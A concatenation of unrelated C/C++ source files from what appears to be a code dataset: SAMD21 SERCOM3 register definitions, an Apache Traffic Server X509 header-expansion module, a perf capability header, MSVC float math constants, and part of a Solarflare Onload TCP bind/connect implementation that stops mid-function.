#define REG_SERCOM3_I2CM_INTENCLR  (*(RwReg8 *)0x42001414UL) /**< \brief (SERCOM3) I2CM Interrupt Enable Clear */
#define REG_SERCOM3_I2CM_INTENSET  (*(RwReg8 *)0x42001416UL) /**< \brief (SERCOM3) I2CM Interrupt Enable Set */
#define REG_SERCOM3_I2CM_INTFLAG   (*(RwReg8 *)0x42001418UL) /**< \brief (SERCOM3) I2CM Interrupt Flag Status and Clear */
#define REG_SERCOM3_I2CM_STATUS    (*(RwReg16*)0x4200141AUL) /**< \brief (SERCOM3) I2CM Status */
#define REG_SERCOM3_I2CM_SYNCBUSY  (*(RoReg  *)0x4200141CUL) /**< \brief (SERCOM3) I2CM Synchronization Busy */
#define REG_SERCOM3_I2CM_ADDR      (*(RwReg  *)0x42001424UL) /**< \brief (SERCOM3) I2CM Address */
#define REG_SERCOM3_I2CM_DATA      (*(RwReg8 *)0x42001428UL) /**< \brief (SERCOM3) I2CM Data */
#define REG_SERCOM3_I2CM_DBGCTRL   (*(RwReg8 *)0x42001430UL) /**< \brief (SERCOM3) I2CM Debug Control */
/* ----- I2C slave mode ----- */
#define REG_SERCOM3_I2CS_CTRLA     (*(RwReg  *)0x42001400UL) /**< \brief (SERCOM3) I2CS Control A */
#define REG_SERCOM3_I2CS_CTRLB     (*(RwReg  *)0x42001404UL) /**< \brief (SERCOM3) I2CS Control B */
#define REG_SERCOM3_I2CS_INTENCLR  (*(RwReg8 *)0x42001414UL) /**< \brief (SERCOM3) I2CS Interrupt Enable Clear */
#define REG_SERCOM3_I2CS_INTENSET  (*(RwReg8 *)0x42001416UL) /**< \brief (SERCOM3) I2CS Interrupt Enable Set */
#define REG_SERCOM3_I2CS_INTFLAG   (*(RwReg8 *)0x42001418UL) /**< \brief (SERCOM3) I2CS Interrupt Flag Status and Clear */
#define REG_SERCOM3_I2CS_STATUS    (*(RwReg16*)0x4200141AUL) /**< \brief (SERCOM3) I2CS Status */
#define REG_SERCOM3_I2CS_SYNCBUSY  (*(RoReg  *)0x4200141CUL) /**< \brief (SERCOM3) I2CS Synchronization Busy */
#define REG_SERCOM3_I2CS_ADDR      (*(RwReg  *)0x42001424UL) /**< \brief (SERCOM3) I2CS Address */
#define REG_SERCOM3_I2CS_DATA      (*(RwReg8 *)0x42001428UL) /**< \brief (SERCOM3) I2CS Data */
/* ----- SPI mode ----- */
#define REG_SERCOM3_SPI_CTRLA      (*(RwReg  *)0x42001400UL) /**< \brief (SERCOM3) SPI Control A */
#define REG_SERCOM3_SPI_CTRLB      (*(RwReg  *)0x42001404UL) /**< \brief (SERCOM3) SPI Control B */
#define REG_SERCOM3_SPI_BAUD       (*(RwReg8 *)0x4200140CUL) /**< \brief (SERCOM3) SPI Baud Rate */
#define REG_SERCOM3_SPI_INTENCLR   (*(RwReg8 *)0x42001414UL) /**< \brief (SERCOM3) SPI Interrupt Enable Clear */
#define REG_SERCOM3_SPI_INTENSET   (*(RwReg8 *)0x42001416UL) /**< \brief (SERCOM3) SPI Interrupt Enable Set */
#define REG_SERCOM3_SPI_INTFLAG    (*(RwReg8 *)0x42001418UL) /**< \brief (SERCOM3) SPI Interrupt Flag Status and Clear */
#define REG_SERCOM3_SPI_STATUS     (*(RwReg16*)0x4200141AUL) /**< \brief (SERCOM3) SPI Status */
#define REG_SERCOM3_SPI_SYNCBUSY   (*(RoReg  *)0x4200141CUL) /**< \brief (SERCOM3) SPI Synchronization Busy */
#define REG_SERCOM3_SPI_ADDR       (*(RwReg  *)0x42001424UL) /**< \brief (SERCOM3) SPI Address */
#define REG_SERCOM3_SPI_DATA       (*(RwReg  *)0x42001428UL) /**< \brief (SERCOM3) SPI Data */
#define REG_SERCOM3_SPI_DBGCTRL    (*(RwReg8 *)0x42001430UL) /**< \brief (SERCOM3) SPI Debug Control */
/* ----- USART mode ----- */
#define REG_SERCOM3_USART_CTRLA    (*(RwReg  *)0x42001400UL) /**< \brief (SERCOM3) USART Control A */
#define REG_SERCOM3_USART_CTRLB    (*(RwReg  *)0x42001404UL) /**< \brief (SERCOM3) USART Control B */
#define REG_SERCOM3_USART_BAUD     (*(RwReg16*)0x4200140CUL) /**< \brief (SERCOM3) USART Baud Rate */
#define REG_SERCOM3_USART_RXPL     (*(RwReg8 *)0x4200140EUL) /**< \brief (SERCOM3) USART Receive Pulse Length */
#define REG_SERCOM3_USART_INTENCLR (*(RwReg8 *)0x42001414UL) /**< \brief (SERCOM3) USART Interrupt Enable Clear */
#define REG_SERCOM3_USART_INTENSET (*(RwReg8 *)0x42001416UL) /**< \brief (SERCOM3) USART Interrupt Enable Set */
#define REG_SERCOM3_USART_INTFLAG  (*(RwReg8 *)0x42001418UL) /**< \brief (SERCOM3) USART Interrupt Flag Status and Clear */
#define REG_SERCOM3_USART_STATUS   (*(RwReg16*)0x4200141AUL) /**< \brief (SERCOM3) USART Status */
#define REG_SERCOM3_USART_SYNCBUSY (*(RoReg  *)0x4200141CUL) /**< \brief (SERCOM3) USART Synchronization Busy */
#define REG_SERCOM3_USART_DATA     (*(RwReg16*)0x42001428UL) /**< \brief (SERCOM3) USART Data */
#define REG_SERCOM3_USART_DBGCTRL  (*(RwReg8 *)0x42001430UL) /**< \brief (SERCOM3) USART Debug Control */
#endif /* (defined(__ASSEMBLY__) || defined(__IAR_SYSTEMS_ASM__)) */

/* ========== Instance parameters for SERCOM3 peripheral ========== */
#define SERCOM3_DMAC_ID_RX          7        // Index of DMA RX trigger
#define SERCOM3_DMAC_ID_TX          8        // Index of DMA TX trigger
#define SERCOM3_GCLK_ID_CORE        23       // Index of Generic Clock for Core
#define SERCOM3_GCLK_ID_SLOW        19       // Index of Generic Clock for SMbus timeout
#define SERCOM3_INT_MSB             6

#endif /* _SAMD21_SERCOM3_INSTANCE_ */
{ "language": "C" }
/*
 * Licensed to the Apache Software Foundation (ASF) under one
 * or more contributor license agreements.  See the NOTICE file
 * distributed with this work for additional information
 * regarding copyright ownership.  The ASF licenses this file
 * to you under the Apache License, Version 2.0 (the
 * "License"); you may not use this file except in compliance
 * with the License.  You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

#include <array>
#include "sslheaders.h"
#include <openssl/x509.h>
#include <openssl/pem.h>

// An expansion takes an X509 certificate and appends one formatted field
// of it to the supplied memory BIO.
using x509_expansion = void (*)(X509 *, BIO *);

// No-op expansion for SSL_HEADERS_FIELD_NONE; leaves the BIO empty.
static void
x509_expand_none(X509 *, BIO *)
{
  // placeholder
}

// Write the whole certificate in PEM form, flattened onto a single line.
static void
x509_expand_certificate(X509 *x509, BIO *bio)
{
  long  remain;
  char *ptr;

  PEM_write_bio_X509(bio, x509);

  // The PEM format has newlines in it. mod_ssl replaces those with spaces.
  // Walk the BIO's internal buffer, overwriting each '\n' in place;
  // [ptr, ptr+remain) is always the unscanned tail of the buffer.
  remain = BIO_get_mem_data(bio, &ptr);
  for (char *nl; (nl = static_cast<char *>(memchr(ptr, '\n', remain))); ptr = nl) {
    *nl = ' ';
    remain -= nl - ptr;
  }
}

// Append the subject DN in one-line form.
static void
x509_expand_subject(X509 *x509, BIO *bio)
{
  X509_NAME *name = X509_get_subject_name(x509);
  X509_NAME_print_ex(bio, name, 0 /* indent */, XN_FLAG_ONELINE);
}

// Append the issuer DN in one-line form.
static void
x509_expand_issuer(X509 *x509, BIO *bio)
{
  X509_NAME *name = X509_get_issuer_name(x509);
  X509_NAME_print_ex(bio, name, 0 /* indent */, XN_FLAG_ONELINE);
}

// Append the serial number as uppercase hex.
static void
x509_expand_serial(X509 *x509, BIO *bio)
{
  ASN1_INTEGER *serial = X509_get_serialNumber(x509);
  i2a_ASN1_INTEGER(bio, serial);
}

// Append the certificate signature as uppercase hex.
static void
x509_expand_signature(X509 *x509, BIO *bio)
{
  const ASN1_BIT_STRING *sig;

  // API for fetching the signature differs across OpenSSL versions:
  // 1.1.0+ takes a const out-pointer, 1.0.2 a non-const one, and
  // earlier versions expose the struct member directly.
#if OPENSSL_VERSION_NUMBER >= 0x010100000
  X509_get0_signature(&sig, nullptr, x509);
#elif OPENSSL_VERSION_NUMBER >= 0x010002000
  X509_get0_signature(const_cast<ASN1_BIT_STRING **>(&sig), nullptr, x509);
#else
  sig = x509->signature;
#endif

  const char *ptr = reinterpret_cast<const char *>(sig->data);
  const char *end = ptr + sig->length;

  // The canonical OpenSSL way to format the signature seems to be
  // X509_signature_dump(). However that separates each byte with a ':', which is
  // human readable, but would be annoying to parse out of headers. We format as
  // uppercase hex to match the serial number formatting.
  for (; ptr < end; ++ptr) {
    BIO_printf(bio, "%02X", static_cast<unsigned char>(*ptr));
  }
}

// Append the notBefore validity timestamp in ASN1_TIME_print() format.
static void
x509_expand_notbefore(X509 *x509, BIO *bio)
{
  ASN1_TIME *time = X509_get_notBefore(x509);
  ASN1_TIME_print(bio, time);
}

// Append the notAfter validity timestamp in ASN1_TIME_print() format.
static void
x509_expand_notafter(X509 *x509, BIO *bio)
{
  ASN1_TIME *time = X509_get_notAfter(x509);
  ASN1_TIME_print(bio, time);
}

// Dispatch table, indexed by ExpansionField; order must match the
// SSL_HEADERS_FIELD_* enumeration.
static const std::array<x509_expansion, SSL_HEADERS_FIELD_MAX> expansions = {{
  x509_expand_none,        // SSL_HEADERS_FIELD_NONE
  x509_expand_certificate, // SSL_HEADERS_FIELD_CERTIFICATE
  x509_expand_subject,     // SSL_HEADERS_FIELD_SUBJECT
  x509_expand_issuer,      // SSL_HEADERS_FIELD_ISSUER
  x509_expand_serial,      // SSL_HEADERS_FIELD_SERIAL
  x509_expand_signature,   // SSL_HEADERS_FIELD_SIGNATURE
  x509_expand_notbefore,   // SSL_HEADERS_FIELD_NOTBEFORE
  x509_expand_notafter,    // SSL_HEADERS_FIELD_NOTAFTER
}};

// Expand the requested certificate field into [bio], resetting the BIO first.
// Out-of-range fields are silently ignored; always returns true.
bool
SslHdrExpandX509Field(BIO *bio, X509 *x509, ExpansionField field)
{
  // Rewind the BIO.
  (void)BIO_reset(bio);

  if (field < expansions.size()) {
    expansions[field](x509, bio);
  }

#if 0
  if (BIO_pending(bio)) {
    long len;
    char * ptr;

    len = BIO_get_mem_data(bio, &ptr);
    SslHdrDebug("X509 field %d: %.*s", (int)field, (int)len, ptr);
  }
#endif

  return true;
}
{ "language": "C" }
/* SPDX-License-Identifier: GPL-2.0 */
#ifndef __PERF_CAP_H
#define __PERF_CAP_H

/* Capability checking for perf: when libcap is available we test the
 * specific capability, otherwise we fall back to an euid==0 check. */

#include <stdbool.h>
#include <linux/capability.h>
#include <linux/compiler.h>

#ifdef HAVE_LIBCAP_SUPPORT

#include <sys/capability.h>

/* Returns true if the effective capability set contains [cap]. */
bool perf_cap__capable(cap_value_t cap);

#else

#include <unistd.h>
#include <sys/types.h>

/* Without libcap we cannot query individual capabilities; approximate
 * by treating root (euid 0) as capable of everything. */
static inline bool perf_cap__capable(int cap __maybe_unused)
{
	return geteuid() == 0;
}

#endif /* HAVE_LIBCAP_SUPPORT */

/* For older systems whose capability headers predate these values */
#ifndef CAP_SYSLOG
#define CAP_SYSLOG 34
#endif

#ifndef CAP_PERFMON
#define CAP_PERFMON 38
#endif

#endif /* __PERF_CAP_H */
{ "language": "C" }
// values used by math functions -- IEEE 754 float version #if defined(_M_CEE_PURE) #if defined(MRTDLL) #undef MRTDLL #endif #if defined(MRTDLL) #undef CRTDLL #endif #endif #include "xmath.h" // macros #define NBITS (16 + _FOFF) #if _D0 == 0 #define INIT(w0) \ { w0, 0 } #define INIT2(w0, w1) \ { w0, w1 } #else // _D0 == 0 #define INIT(w0) \ { 0, w0 } #define INIT2(w0, w1) \ { w1, w0 } #endif // _D0 == 0 _EXTERN_C_UNLESS_PURE // static data extern /* const */ _Dconst _FDenorm = {INIT2(0, 1)}; extern /* const */ _Dconst _FEps = {INIT((_FBIAS - NBITS - 1) << _FOFF)}; extern /* const */ _Dconst _FInf = {INIT(_FMAX << _FOFF)}; extern /* const */ _Dconst _FNan = {INIT((_FMAX << _FOFF) | (1 << (_FOFF - 1)))}; extern /* const */ _Dconst _FSnan = {INIT2(_FMAX << _FOFF, 1)}; extern /* const */ _Dconst _FRteps = {INIT((_FBIAS - NBITS / 2) << _FOFF)}; extern /* const */ float _FXbig = (NBITS + 1) * 347L / 1000; extern /* const */ float _FZero = 0.0F; _END_EXTERN_C_UNLESS_PURE /* * Copyright (c) by P.J. Plauger. All rights reserved. * Consult your license regarding permissions and restrictions. V6.50:0009 */
{ "language": "C" }
/* SPDX-License-Identifier: GPL-2.0 */
/* X-SPDX-Copyright-Text: (c) Solarflare Communications Inc */
/**************************************************************************\
*//*! \file
** <L5_PRIVATE L5_SOURCE>
** \author  djr/ctk
** \brief  TCP connection routines:
**         accept, bind, close, connect, shutdown, getpeername
** \date  2003/06/03
** \cop  (c) Level 5 Networks Limited.
** </L5_PRIVATE>
*//*
\**************************************************************************/

/*! \cidoxg_lib_transport_ip */

#include "ip_internal.h"
#include <onload/common.h>
#include <onload/sleep.h>

#ifdef ONLOAD_OFE
#include "ofe/onload.h"
#endif

#ifndef __KERNEL__
#include <ci/internal/efabcfg.h>
#endif

#define VERB(x)

#define LPF "tcp_connect: "

#ifndef __KERNEL__
/*!
 * Tests for valid sockaddr & sockaddr length & AF_INET or AF_INET6.
 * Returns 0 on success; otherwise sets errno and returns an error.
 */
static int ci_tcp_validate_sa( sa_family_t domain,
                               const struct sockaddr* sa, socklen_t sa_len )
{
  /*
   * Linux deviates from documented behaviour here;
   * On Linux we return EINVAL if sa and sa_len are NULL and 0 respectively,
   * and we return EFAULT if sa is NULL and sa_len != 0....
   */
  if( !sa ) {
    LOG_U(ci_log(LPF "invalid sockaddr : sa = %lx, sa_len = %d",
                 (long) sa, sa_len));
    if( sa_len == 0 )
      RET_WITH_ERRNO( EINVAL );
    else
      RET_WITH_ERRNO( EFAULT );
  }

  if( sa_len < sizeof(struct sockaddr_in)
#if CI_CFG_FAKE_IPV6
      || (domain == AF_INET6 && sa_len < SIN6_LEN_RFC2133)
#endif
      ) {
    LOG_U( ci_log(LPF "struct too short to be sockaddr_in(6)" ));
    RET_WITH_ERRNO( EINVAL );
  }

  /* It should be sa->sa_family, but MS wdm does not understand it,
   * so let's use CI_SIN(sa)->sin_family.
   */
  if (CI_SIN(sa)->sin_family != domain &&
      CI_SIN(sa)->sin_family != AF_UNSPEC) {
    LOG_U(ci_log(LPF "address family %d does not match "
                 "with socket domain %d", CI_SIN(sa)->sin_family, domain));
    RET_WITH_ERRNO(EAFNOSUPPORT);
  }

#if CI_CFG_FAKE_IPV6 && !CI_CFG_IPV6
  if (sa->sa_family == AF_INET6 && !ci_tcp_ipv6_is_ipv4(sa)) {
    LOG_TC(ci_log(LPF "Pure IPv6 address is not supported"));
    RET_WITH_ERRNO(EAFNOSUPPORT);
  }
#endif
  return 0;
}
#endif


/* The flags and state associated with bind are complex.  This function
 * provides a basic consistency check on the enabled flags.
 */
ci_inline void ci_tcp_bind_flags_assert_valid(ci_sock_cmn* s)
{
  if( s->s_flags & CI_SOCK_FLAG_DEFERRED_BIND ) {
    /* If we deferred the bind we need to know that we should bind later */
    ci_assert( s->s_flags & CI_SOCK_FLAG_CONNECT_MUST_BIND );

    /* We can only defer bind in cases where the application doesn't bind to
     * a specific port.
     */
    ci_assert( s->s_flags & ~CI_SOCK_FLAG_PORT_BOUND );
  }
}


/* Bind a TCP socket, performing an OS socket bind if necessary.
 * \param ni       Stack
 * \param s        Socket to be bound
 * \param fd       File descriptor (unused in kernel)
 * \param ci_addr_t     Local address to which to bind
 * \param port_be16     [in] requested port [out] assigned port
 * \param may_defer Whether OS socket bind can be deferred
 * \return 0 - success & [port_be16] updated
 *         CI_SOCKET_HANDOVER, Pass to OS, OS bound ok, (no error)
 *         CI_SOCKET_ERROR & errno set
 */
int __ci_tcp_bind(ci_netif *ni, ci_sock_cmn *s, ci_fd_t fd,
                  ci_addr_t addr, ci_uint16* port_be16, int may_defer)
{
  int rc = 0;
  ci_uint16 user_port; /* Port number specified by user, not by OS.
                        * See bug 4015 for details */
  union ci_sockaddr_u sa_u;

  ci_assert(s->domain == AF_INET || s->domain == AF_INET6);
  ci_assert( port_be16 );
  ci_assert(s->b.state & CI_TCP_STATE_TCP ||
            s->b.state == CI_TCP_STATE_ACTIVE_WILD);
  ci_tcp_bind_flags_assert_valid(s);

  user_port = *port_be16;

  if( !(s->s_flags & CI_SOCK_FLAG_TPROXY) ) {
    /* In active-wild mode we might not want to bind yet.
     */
    if( !may_defer || !NI_OPTS(ni).tcp_shared_local_ports || user_port != 0 ) {
      /* Build a sockaddr of the right family for the OS bind. */
#if CI_CFG_FAKE_IPV6
      ci_assert(s->domain == AF_INET || s->domain == AF_INET6);
      if( s->domain == AF_INET )
        ci_make_sockaddr_from_ip4(&sa_u.sin, user_port, addr.ip4);
      else if( !CI_IS_ADDR_IP6(addr) )
        ci_make_sockaddr_in6_from_ip4(&sa_u.sin6, user_port, addr.ip4);
#if CI_CFG_IPV6
      else {
        ci_make_sockaddr_in6_from_ip6(&sa_u.sin6, user_port,
                                      (ci_uint32*)addr.ip6);
        /* Bind to link-local address requires an interface */
        sa_u.sin6.sin6_scope_id = s->cp.so_bindtodevice;
      }
#endif
#else
      ci_assert(s->domain == AF_INET);
      ci_make_sockaddr_from_ip4(&sa_u.sin, user_port, addr.ip4);
#endif

#ifdef __ci_driver__
      rc = efab_tcp_helper_bind_os_sock_kernel(netif2tcp_helper_resource(ni),
                                               SC_SP(s), &sa_u.sa,
                                               sizeof(sa_u), port_be16);
#else
      rc = ci_tcp_helper_bind_os_sock(fd, &sa_u.sa, sizeof(sa_u), port_be16);
#endif
      if( rc == 0 )
        s->s_flags &= ~(CI_SOCK_FLAG_CONNECT_MUST_BIND |
                        CI_SOCK_FLAG_DEFERRED_BIND);
    }
    /* We can defer this bind.  We need to make an extra check for the socket
     * already having been bound.  In the non-deferred case this is enforced
     * by the binding of the OS socket, but we don't have that luxury here. */
    else if( s->s_flags & CI_SOCK_FLAG_DEFERRED_BIND ||
             ! (s->s_flags & CI_SOCK_FLAG_CONNECT_MUST_BIND) ) {
      /* Already bound. */
      CI_SET_ERROR(rc, EINVAL);
    }
    else {
      /* CI_SOCK_FLAG_DEFERRED_BIND is clear, so either we never set it
       * (meaning nobody called bind()) or we've since cleared it (meaning
       * that the deferred bind has been performed).  Only in the former case
       * are we allowed to bind now, but the latter case should have been
       * checked by the caller. */
      ci_tcp_state* c = &SOCK_TO_WAITABLE_OBJ(s)->tcp;
      ci_assert_equal(s->b.state, CI_TCP_CLOSED);
      ci_assert(~c->tcpflags & CI_TCPT_FLAG_WAS_ESTAB);
      (void) c;
      s->s_flags |= CI_SOCK_FLAG_DEFERRED_BIND;
      rc = 0;
    }
  }
  else {
    /* CI_SOCK_FLAG_TPROXY is set.  We don't use OS backing sockets for
     * these, and we don't support deferred binds either.
     */
    ci_assert_nflags(s->s_flags, CI_SOCK_FLAG_DEFERRED_BIND);
    s->s_flags &= ~CI_SOCK_FLAG_CONNECT_MUST_BIND;
  }

  /* bug1781: only do this if the earlier bind succeeded.
   * check if we can handle this socket */
  if( rc != 0 )
    return rc;
  if( user_port != 0 )
    s->s_flags |= CI_SOCK_FLAG_PORT_BOUND;
  if( !CI_IPX_ADDR_IS_ANY(addr) )
    s->cp.sock_cp_flags |= OO_SCP_BOUND_ADDR;

#ifndef __ci_driver__
  /* We do not call bind() to alien address from in-kernel code */
  if( ! (s->s_flags & CI_SOCK_FLAG_TPROXY) && !CI_IPX_ADDR_IS_ANY(addr) &&
      ! cicp_user_addr_is_local_efab(ni, addr) )
    s->s_flags |= CI_SOCK_FLAG_BOUND_ALIEN;
#endif

  ci_tcp_bind_flags_assert_valid(s);
  return rc;
}


/* Does [dst_addr] match the local address this listener is bound to?
 * Returns non-zero (true) on a match. */
static int /*bool*/
ci_tcp_connect_check_local_dst_addr(ci_tcp_socket_listen* tls,
                                    ci_addr_t dst_addr)
{
  if( !CI_IPX_ADDR_IS_ANY(tls->s.laddr) )
    return CI_IPX_ADDR_EQ(tls->s.laddr, dst_addr);
#if CI_CFG_IPV6
  else {
    if( CI_IS_ADDR_IP6(dst_addr) )
      return CI_IS_ADDR_IP6(tls->s.laddr);
    else
      return !(tls->s.s_flags & CI_SOCK_FLAG_V6ONLY);
  }
#endif
  return 1;
}


/* Find a listening socket in this stack that a loopback connect to
 * [dst_addr]:[dport_be16] could be short-circuited to.
 * Returns the listener's socket id, OO_SP_NULL if none matches, or
 * OO_SP_INVALID if a match was found but its accept queue is full. */
oo_sp ci_tcp_connect_find_local_peer(ci_netif *ni, int locked,
                                     ci_addr_t dst_addr, int dport_be16)
{
  ci_tcp_socket_listen* tls;
  int i;
  oo_sp sock = OO_SP_NULL;

  if( locked ) {
    /* SW filter table look-up does not find socket in scenarios where client
     * attempts to connect with non-SF IP address to INADDR_ANY bound
     * listening socket */
    /* FIXME: make ci_netif_listener_lookup() work for unlocked stacks */
    /* FIXME: enable IPv6, bug 84048 */
    sock = ci_netif_listener_lookup(ni, CI_IS_ADDR_IP6(dst_addr) ?
                                        AF_SPACE_FLAG_IP6 : AF_SPACE_FLAG_IP4,
                                    dst_addr, dport_be16);
  }

  if( OO_SP_NOT_NULL(sock) ) {
    tls = ID_TO_TCP_LISTEN(ni, sock);
    if( ( ~tls->s.b.sb_aflags & CI_SB_AFLAG_ORPHAN ) &&
        ( tls->s.cp.so_bindtodevice == CI_IFID_BAD ) )
      goto found;
  }

  /* Socket has not been found through SW filter table look-up.
   * Perform full search to cover the case when destination address
   * does not belong to SF interface.
   */
  for( i = 0; i < (int)ni->state->n_ep_bufs; ++i ) {
    citp_waitable_obj* wo = ID_TO_WAITABLE_OBJ(ni, i);
    if( wo->waitable.state != CI_TCP_LISTEN ) continue;
    if( wo->waitable.sb_aflags & CI_SB_AFLAG_ORPHAN ) continue;
    tls = SOCK_TO_TCP_LISTEN(&wo->sock);
    if( tls->s.cp.lport_be16 != dport_be16 ) continue;
    if( !ci_tcp_connect_check_local_dst_addr(tls, dst_addr) ) continue;
    if( tls->s.cp.so_bindtodevice != CI_IFID_BAD ) continue;
    goto found;
  }
  return OO_SP_NULL;

 found:
  /* this is our tls - connect to it! */
  if( (int)ci_tcp_acceptq_n(tls) < tls->acceptq_max )
    return tls->s.b.bufid;
  else
    return OO_SP_INVALID;
}


#if CI_CFG_IPV6
/* Rewrite the ipcache headers from IPv6 to IPv4 layout; the TCP header
 * is moved to follow the (shorter) IPv4 header. */
static void ci_tcp_init_ipcache_ip4_hdr(ci_tcp_state* ts)
{
  ci_init_ipcache_ip4_hdr(&ts->s);
  memmove(&ts->s.pkt.ipx.ip4 + 1, &ts->s.pkt.ipx.ip6 + 1,
          sizeof(ci_tcp_hdr));
  ts->outgoing_hdrs_len -= CI_IPX_HDR_SIZE(AF_INET6) -
                           CI_IPX_HDR_SIZE(AF_INET);

  if( CI_IS_ADDR_IP6(ts->s.cp.laddr) ) {
    ci_assert(CI_IPX_ADDR_IS_ANY(ts->s.cp.laddr));
    ts->s.cp.laddr = ip4_addr_any;
  }
}

/* Rewrite the ipcache headers from IPv4 to IPv6 layout; the TCP header
 * is moved first, before the IPv6 header is written over it. */
static void ci_tcp_init_ipcache_ip6_hdr(ci_tcp_state* ts)
{
  memmove(&ts->s.pkt.ipx.ip6 + 1, &ts->s.pkt.ipx.ip4 + 1,
          sizeof(ci_tcp_hdr));
  ci_init_ipcache_ip6_hdr(&ts->s);
  ts->outgoing_hdrs_len += CI_IPX_HDR_SIZE(AF_INET6) -
                           CI_IPX_HDR_SIZE(AF_INET);

  if( ! CI_IS_ADDR_IP6(ts->s.cp.laddr) ) {
    ci_assert(CI_IPX_ADDR_IS_ANY(ts->s.cp.laddr));
    ts->s.cp.laddr = addr_any;
  }
}

/*
 * Convert ipcache from IPv4 to IPv6 and backwards. We always start with
 * IPv4, but in result of socket reuse (listen+shutdown, failed connect,
 * etc) we can get a socket in any state.
 */
void ci_tcp_ipcache_convert(int af, ci_tcp_state* ts)
{
  if( IS_AF_INET6(af) ) {
    if( !ipcache_is_ipv6(&ts->s.pkt) )
      ci_tcp_init_ipcache_ip6_hdr(ts);
  }
  else if( ipcache_is_ipv6(&ts->s.pkt) ) {
    ci_tcp_init_ipcache_ip4_hdr(ts);
  }
}
#endif


#ifndef __KERNEL__
/* check that we can handle this destination.
 * Returns 0 if the connection can be accelerated, CI_SOCKET_HANDOVER if the
 * socket must be passed to the OS. */
static int ci_tcp_connect_check_dest(citp_socket* ep, ci_addr_t dst,
                                     int dport_be16)
{
  ci_ip_cached_hdrs* ipcache = &ep->s->pkt;
  ci_addr_t src = sock_ipx_laddr(ep->s);

#if CI_CFG_IPV6
  /*
   * Socket was bound to IPv4 and connecting to IPv6 or vice versa - hand
   * it over.
   */
  if( (ep->s->cp.sock_cp_flags & OO_SCP_BOUND_ADDR) &&
      CI_ADDR_AF(dst) != CI_ADDR_AF(ep->s->laddr) ) {
    CITP_STATS_NETIF(++ep->netif->state->stats.tcp_connect_af_mismatch);
    return CI_SOCKET_HANDOVER;
  }

  /* IPV6_V6ONLY prevents from connecting to IPv4 address */
  if( CI_ADDR_AF(dst) == AF_INET && (ep->s->s_flags & CI_SOCK_FLAG_V6ONLY) ) {
    CITP_STATS_NETIF(++ep->netif->state->stats.tcp_connect_af_mismatch);
    return CI_SOCKET_HANDOVER;
  }

  ci_tcp_ipcache_convert(CI_ADDR_AF(dst), SOCK_TO_TCP(ep->s));
#endif

  ci_sock_set_raddr_port(ep->s, dst, dport_be16);
  ci_ip_cache_invalidate(ipcache);
  cicp_user_retrieve(ep->netif, ipcache, &ep->s->cp);

  /* Control plane has selected a source address for us -- remember it. */
  if( ipcache->status != retrrc_noroute &&
      ipcache->status != retrrc_alienroute &&
      CI_IPX_ADDR_IS_ANY(src) ) {
    ci_sock_set_laddr(ep->s, ipcache_laddr(ipcache));
    ep->s->cp.laddr = ep->s->laddr;
  }

  if(CI_LIKELY( ipcache->status == retrrc_success ||
                ipcache->status == retrrc_nomac   ||
                ipcache->status < 0 )) {
    /* Onloadable. */
    if( ipcache->encap.type & CICP_LLAP_TYPE_XMIT_HASH_LAYER4 )
      /* We don't yet have a local port number, so the result of that
       * lookup may be wrong.
       */
      ci_ip_cache_invalidate(ipcache);
    return 0;
  }
  else if( ipcache->status == retrrc_localroute ) {
    ci_tcp_state* ts = SOCK_TO_TCP(ep->s);

    if( NI_OPTS(ep->netif).tcp_client_loopback == CITP_TCP_LOOPBACK_OFF)
      return CI_SOCKET_HANDOVER;
    ep->s->s_flags |= CI_SOCK_FLAG_BOUND_ALIEN;
    if( NI_OPTS(ep->netif).tcp_server_loopback != CITP_TCP_LOOPBACK_OFF )
      ts->local_peer = ci_tcp_connect_find_local_peer(ep->netif,
                                                      1 /* locked */,
                                                      dst, dport_be16);
    else
      ts->local_peer = OO_SP_NULL;

    if( OO_SP_NOT_NULL(ts->local_peer) ||
        NI_OPTS(ep->netif).tcp_client_loopback !=
        CITP_TCP_LOOPBACK_SAMESTACK ) {
      ipcache->flags |= CI_IP_CACHE_IS_LOCALROUTE;
      ipcache->ether_offset = 4; /* lo is non-VLAN */
      ipcache->dport_be16 = dport_be16;
      return 0;
    }
    return CI_SOCKET_HANDOVER;
  }
  return CI_SOCKET_HANDOVER;
}
#endif


/* Callback for cicp_find_ifindex_by_ip(): match on a specific ifindex
 * passed via [data]. */
static int/*bool*/ cicp_check_ipif_ifindex(struct oo_cplane_handle* cp,
                                           ci_ifid_t ifindex, void* data)
{
  return ifindex == *(ci_ifid_t*)data;
}


/* Decide whether a listening socket should share the interface MAC filter.
 * Returns non-zero (true) if it should. */
int ci_tcp_use_mac_filter_listen(ci_netif* ni, ci_sock_cmn* s,
                                 ci_ifid_t ifindex)
{
  int mode;

  if( NI_OPTS(ni).scalable_filter_enable == CITP_SCALABLE_FILTERS_DISABLE )
    return 0;

  mode = NI_OPTS(ni).scalable_filter_mode;
  if( (mode & CITP_SCALABLE_MODE_PASSIVE) == 0 )
    return 0;

  /* Listening sockets bound to an IP address on an interface that we have
   * a MAC filter for share that MAC filter. Clustering setting of listening
   * socket needs to match scalable mode rss-wise. */
  if( ((NI_OPTS(ni).cluster_ignore == 1 ) ||
       ! (s->s_flags & CI_SOCK_FLAG_REUSEPORT)) ==
      !(mode & CITP_SCALABLE_MODE_RSS) ) {
    /* If we've been configured to use scalable filters on all interfaces,
     * then we can do so without further ado. */
    if( NI_OPTS(ni).scalable_filter_ifindex_passive ==
        CITP_SCALABLE_FILTERS_ALL )
      return 1;

    /* based on bind to device we might be using scalable iface */
    if( ifindex <= 0 ) {
      /* Determine which ifindex the IP address being bound to is on.
       */
      ifindex = NI_OPTS(ni).scalable_filter_ifindex_passive;
      return cicp_find_ifindex_by_ip(ni->cplane, sock_laddr(s),
                                     cicp_check_ipif_ifindex, &ifindex);
    }
    return (NI_OPTS(ni).scalable_filter_ifindex_passive == ifindex);
  }

  return 0;
}


/* Decide whether socket [s] should use a MAC (scalable) filter instead of
 * a per-socket hw filter.  [from_tcp_id], when valid, is the listener the
 * socket was accepted from.  Returns non-zero (true) if so. */
int ci_tcp_use_mac_filter(ci_netif* ni, ci_sock_cmn* s,
                          ci_ifid_t ifindex, oo_sp from_tcp_id)
{
  int use_mac_filter = 0;
  int mode;

  if( NI_OPTS(ni).scalable_filter_enable != CITP_SCALABLE_FILTERS_ENABLE )
    return 0;

  mode = NI_OPTS(ni).scalable_filter_mode;
